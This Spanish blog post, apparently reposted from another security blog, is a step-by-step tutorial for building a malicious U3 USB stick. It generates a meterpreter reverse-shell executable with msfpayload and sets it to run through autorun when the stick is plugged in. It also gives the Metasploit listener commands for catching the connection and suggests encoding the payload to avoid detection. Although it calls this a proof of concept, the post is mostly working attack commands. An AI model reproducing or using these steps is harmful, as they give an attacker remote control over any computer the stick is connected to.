Ataque USB U3 con MetaSploit

En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.


1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.


2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:

[AutoRun] open=malware.exe

Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.


3. Grabamos la ISO

Luego corremos Universal Customizer y vamos siguiendo los pasos:


Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.


4. Escuchamos por la Conexión Reversa

Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:

./msfconsole use exploit/multi/handler set PAYLAOD windows/meterpreter/reverse_tcp set LHOST 1.1.1.1 set LPORT 443 set ExitOnSession false exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.

Información extraída de:
http://www.kungfoosion.com/2010/06/ataque-usb-u3-con-metasploit.html

Comentarios

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cambiar el idioma de Windows XP de inglés al español sin formatear

Crear un Fake AP en muy pocos pasos con Gerix